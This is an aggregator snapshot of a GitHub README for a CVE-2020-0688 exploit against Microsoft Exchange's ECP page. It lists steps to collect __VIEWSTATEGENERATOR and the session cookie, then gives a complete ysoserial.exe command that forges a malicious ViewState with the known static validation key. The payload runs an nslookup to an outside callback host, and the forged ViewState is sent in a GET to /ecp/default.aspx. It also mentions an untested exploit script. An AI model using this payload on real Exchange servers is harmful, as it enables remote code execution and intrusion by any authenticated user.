21
GitHub - random-robbie/cve-2020-0688: cve-2020-0688
source link: https://github.com/random-robbie/cve-2020-0688
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
README.md
cve-2020-0688
cve-2020-0688
Login with a user with an email address privliage is nothing to worry about.
Grab - __VIEWSTATEGENERATOR
from page source
Grab - the value of ASP.NET_SessionId
cookie for viewstateuserkey value
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
GET TO:
https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>
The Exploit.py is untested and need a demo system to fire up and play with.
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK